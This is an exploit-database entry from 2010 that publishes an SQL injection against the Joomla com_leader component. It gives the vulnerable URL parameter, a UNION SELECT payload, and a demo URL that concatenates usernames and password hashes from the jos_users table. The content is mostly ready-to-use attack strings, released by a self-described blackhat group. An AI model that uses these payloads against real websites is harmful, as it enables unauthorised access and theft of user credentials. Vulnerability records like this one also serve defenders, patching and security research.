Joomla! Component com_leader – SQL Injection

  • 作者: DevilZ TM
    日期: 2010-03-12
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11698/
  • # Title : Joomla Component com_leader SQL Injection Vulnerability 
    # Author: DevilZ TM
    # Data: 2010-03-11
    
    [~]######################################### InformatioN #############################################[~]
     
    [~] Title : Joomla Component com_leader SQL Injection Vulnerability 
    [~] Author: DevilZ TM By D3v1l
    [~] Homepage: http://www.DEVILZTM.com
    [~] Contact : DevilZTM@Gmail.CoM & D3v1l.blackhat@yahoo.com
     
    [~]######################################### ExploiT #############################################[~]
     
    [~] Vulnerable File :
     
    http://127.0.0.1/index.php?option=com_leader&Itemid=3160&task=view&id=[SQL]
     
    [~] ExploiT :
     
    -1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11 FROM jos_users
     
    [~] Example :
     
    http://127.0.0.1/index.php?option=com_leader&Itemid=3160&task=view&id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11 FROM jos_users
    
    [~] Demo:
    
    http://server/index.php?option=com_leader&Itemid=3160&task=view&id=-498 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11 FROM jos_users
     
     
    [~]######################################### ThankS To ... ############################################[~]
     
    [~] Special Thanks To My Best FriendS :
     
    Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
     
    [~] IRANIAN Young HackerZ
     
    [~]######################################### FinisH :D #############################################[~]